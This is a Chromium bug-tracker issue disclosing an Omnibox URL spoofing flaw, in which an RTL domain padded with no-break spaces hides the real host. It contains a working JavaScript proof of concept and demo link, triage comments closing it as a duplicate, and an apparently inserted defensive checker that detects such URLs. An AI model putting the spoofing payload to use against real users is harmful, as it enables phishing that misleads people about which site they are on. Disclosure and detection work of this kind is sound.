
Issue 665358

Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 656417
Owner:
Long OOO (go/where-is-mgiuca)
Closed: Nov 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security




Security: Chrome RTL+ No-break space URL Spoofing

Reported by xis...@gmail.com, Nov 15 2016

Issue description

VULNERABILITY DETAILS
RTL URLs place the IP address on the left side of the Chrome Omnibox. Unicode U+00A0 is the no-break space, which displays as blank in the Chrome Omnibox. A lot of no-break spaces will hide the real domain.

VERSION
Chrome Version: [54.0.2840.98] + [stable]
Operating System: [Windows 7 & 10, Mac 10.12.1, iOS 10.2, Android 7.0]

REPRODUCTION CASE

POC:

<script>
function aa(){
    var link = document.createElement('a');
    // RTL IDN host, then 79 percent-encoded no-break spaces (U+00A0), then the IP text
    link.href = 'http://xn--ggbla1c4e.xn--ngbc5azd/?'+Array(0x50).join("%C2%A0")+'127.0.0.1';
    link.target="aaaa";
    document.body.appendChild(link);
    link.click();
}
</script>

<a onclick="aa();" href="javascript:void(0);">CLICK ME</a>

Online Demo: http://xisigr.com/test/spoof/chrome/rtl_1.html
 
chrome_url_rtl_1.PNG

Comment 1 by mea...@chromium.org, Nov 15 2016

Labels: Team-Security-UX
Owner: mgiuca@chromium.org
Thanks for the report.

mgiuca: Not sure if this is the same as bug 351639, could you please take a look and triage as appropriate? Thanks.
Components: UI>Security>UrlFormatting

Comment 3 by mgiuca@chromium.org, Nov 16 2016

Mergedinto: 656417
Status: Duplicate (was: Unconfirmed)
I think this is most related to Issue 656417. It's essentially the same exploit but using NBSPs instead of other weak-direction characters.

I'll dupe this, but be sure to add this to the list of examples.
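
Added example (not part of the report or of Chromium's code): a triage check that decodes an href's punycode host and flags the combination described above, an RTL host followed by a long run of percent-encoded no-break spaces. The names decodeLabel, checkHref and MIN_PAD, the threshold value and the RTL code point ranges are assumptions made for this sketch.

```javascript
// Added example, not Chromium code. MIN_PAD and the RTL ranges are assumptions.
const MIN_PAD = 8; // assumed threshold for a "long" no-break-space run
// Approximate RTL blocks: Hebrew..Arabic Extended-A plus presentation forms.
const RTL = /[\u0590-\u08FF\uFB1D-\uFDFF\uFE70-\uFEFC]/;

// Decode one "xn--" label per RFC 3492 (no overflow checks; demo only).
function decodeLabel(label) {
  if (!/^xn--/i.test(label)) return label;
  const input = label.slice(4).toLowerCase();
  const cut = input.lastIndexOf('-');
  const out = cut > 0 ? Array.from(input.slice(0, cut), ch => ch.codePointAt(0)) : [];
  let n = 128, i = 0, bias = 72;
  for (let pos = cut > 0 ? cut + 1 : 0; pos < input.length; ) {
    const oldi = i;
    for (let w = 1, k = 36; ; k += 36) {
      if (pos >= input.length) throw new Error('truncated punycode');
      const c = input.charCodeAt(pos++);
      const digit = c >= 97 && c <= 122 ? c - 97 : c >= 48 && c <= 57 ? c - 22 : -1;
      if (digit < 0) throw new Error('bad punycode digit');
      i += digit * w;
      const t = k <= bias ? 1 : k >= bias + 26 ? 26 : k - bias;
      if (digit < t) break;
      w *= 36 - t;
    }
    // Bias adaptation (RFC 3492, section 6.1).
    let delta = Math.floor((i - oldi) / (oldi === 0 ? 700 : 2));
    delta += Math.floor(delta / (out.length + 1));
    let k = 0;
    for (; delta > 455; k += 36) delta = Math.floor(delta / 35);
    bias = k + Math.floor((36 * delta) / (delta + 38));
    n += Math.floor(i / (out.length + 1));
    i %= out.length + 1;
    out.splice(i++, 0, n);
  }
  return String.fromCodePoint(...out);
}

// Flag an href whose host displays RTL and whose tail carries NBSP padding.
function checkHref(href) {
  const u = new URL(href);
  const host = u.hostname.split('.').map(decodeLabel).join('.');
  const runs = (u.pathname + u.search + u.hash).match(/(?:%C2%A0)+/gi) || [];
  const longestPad = Math.max(0, ...runs.map(r => r.length / 6));
  const rtlHost = RTL.test(host);
  return { host, rtlHost, longestPad, suspicious: rtlHost && longestPad >= MIN_PAD };
}
```

Run against the href from the report, checkHref returns rtlHost true, longestPad 79 and suspicious true; the same host without the padding is not flagged.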

Comment 4 by sheriffbot@chromium.org, Aug 30 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
